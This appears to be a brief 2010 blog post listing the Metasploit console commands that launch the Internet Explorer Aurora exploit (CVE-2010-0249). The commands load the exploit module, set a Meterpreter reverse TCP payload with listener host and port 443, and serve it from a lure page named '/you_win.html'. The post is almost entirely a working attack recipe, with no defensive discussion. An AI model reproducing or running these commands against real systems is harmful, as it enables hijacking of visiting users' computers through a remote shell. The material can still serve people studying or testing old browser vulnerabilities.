Tuesday, March 9, 2010

IE Aurora (CVE-2010-0249) with Metasploit 3.x

cd /pentest/exploits/msf3
./msfconsole

msf > use windows/browser/ie_aurora
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit

No comments:

Post a Comment